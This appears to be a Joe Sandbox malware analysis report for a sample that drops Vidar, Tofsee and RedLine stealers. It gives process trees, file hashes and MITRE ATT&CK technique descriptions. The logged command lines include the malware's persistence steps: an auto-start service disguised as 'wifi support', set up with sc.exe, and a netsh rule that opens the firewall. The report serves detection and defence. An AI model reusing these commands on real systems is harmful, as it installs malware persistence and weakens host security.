Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.379514532.0000000000482000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001D.00000002.379514532.0000000000482000.00000004.00000020.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Analysis Process: 952.exe PID: 1068 Parent PID: 3472

General

Start time:	20:50:33
Start date:	13/01/2022
Path:	C:\Users\user\AppData\Local\Temp\952.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\952.exe
Imagebase:	0x400000
File size:	313344 bytes
MD5 hash:	4C29CFD658E015FA4DB5A2454F103D4A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001E.00000002.412229320.0000000000580000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001E.00000003.383697292.00000000005A0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001E.00000002.410807233.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Analysis Process: 13E2.exe PID: 2316 Parent PID: 3472

General

Start time:	20:50:35
Start date:	13/01/2022
Path:	C:\Users\user\AppData\Local\Temp\13E2.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\13E2.exe
Imagebase:	0xc80000
File size:	537088 bytes
MD5 hash:	D7DF01D8158BFADDC8BA48390E52F355
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000020.00000002.447751764.0000000004021000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 46%, Metadefender, Browse Detection: 89%, ReversingLabs

Analysis Process: cmd.exe PID: 4356 Parent PID: 1068

General

Start time:	20:50:41
Start date:	13/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bhlprady\
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6168 Parent PID: 4356

General

Start time:	20:50:42
Start date:	13/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 6248 Parent PID: 1068

General

Start time:	20:50:43
Start date:	13/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\vodibdaj.exe" C:\Windows\SysWOW64\bhlprady\
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6260 Parent PID: 6248

General

Start time:	20:50:44
Start date:	13/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: sc.exe PID: 6304 Parent PID: 1068

General

Start time:	20:50:44
Start date:	13/01/2022
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\sc.exe" create bhlprady binPath= "C:\Windows\SysWOW64\bhlprady\vodibdaj.exe /d\"C:\Users\user\AppData\Local\Temp\952.exe\"" type= own start= auto DisplayName= "wifi support
Imagebase:	0xfd0000
File size:	60928 bytes
MD5 hash:	24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6332 Parent PID: 6304

General

Start time:	20:50:45
Start date:	13/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: sc.exe PID: 6372 Parent PID: 1068

General

Start time:	20:50:46
Start date:	13/01/2022
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\sc.exe" description bhlprady "wifi internet conection
Imagebase:	0xfd0000
File size:	60928 bytes
MD5 hash:	24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6384 Parent PID: 6372

General

Start time:	20:50:46
Start date:	13/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: sc.exe PID: 6412 Parent PID: 1068

General

Start time:	20:50:47
Start date:	13/01/2022
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\sc.exe" start bhlprady
Imagebase:	0xfd0000
File size:	60928 bytes
MD5 hash:	24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6436 Parent PID: 6412

General

Start time:	20:50:48
Start date:	13/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: netsh.exe PID: 6460 Parent PID: 1068

General

Start time:	20:50:48
Start date:	13/01/2022
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Imagebase:	0x11f0000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: vodibdaj.exe PID: 6484 Parent PID: 556

General

Start time:	20:50:49
Start date:	13/01/2022
Path:	C:\Windows\SysWOW64\bhlprady\vodibdaj.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\bhlprady\vodibdaj.exe /d"C:\Users\user\AppData\Local\Temp\952.exe"
Imagebase:	0x400000
File size:	13043712 bytes
MD5 hash:	E331BE085840751FF0AC8DCBCDC5F5E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002C.00000002.417710033.0000000000540000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002C.00000002.417504443.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002C.00000002.417841182.0000000000610000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002C.00000003.415295647.0000000000560000.00000004.00000001.sdmp, Author: Joe Security

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report emPJndhuvA.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre